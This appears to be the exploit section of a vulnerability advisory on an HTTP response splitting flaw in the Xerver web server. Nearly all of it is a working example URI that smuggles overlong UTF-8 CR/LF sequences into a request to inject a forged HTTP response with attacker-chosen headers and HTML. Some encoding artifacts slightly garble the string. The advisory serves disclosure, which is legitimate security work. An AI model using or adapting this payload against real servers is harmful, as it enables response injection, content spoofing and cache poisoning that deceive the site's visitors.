• info
• discussion
• exploit
• solution
• references

Xerver HTTP Response Splitting Vulnerability

To exploit this issue, an attacker must entice an unsuspecting victim into following a malicious URI.

The following example URI is available:

http://www.example.com/test.htm%3BHTTP%C0%AF1.0%20200%20OK%C0%8D%C0%8AContent-Length%3A%2070%C0%8=D%C0%8AContent-Type%3Atext%C0%AFhtml%C0%8D%C0%8A%C0%8D%C0%8A%3Chtml%3E%3Cbo=dy%3E%3Cimg%20src%3D%22http%3A//www.example1.com/test.gif%22%3E%3C/body%3E%3=C/html%3E%8D%C0%8A%C0%8D%C0%8A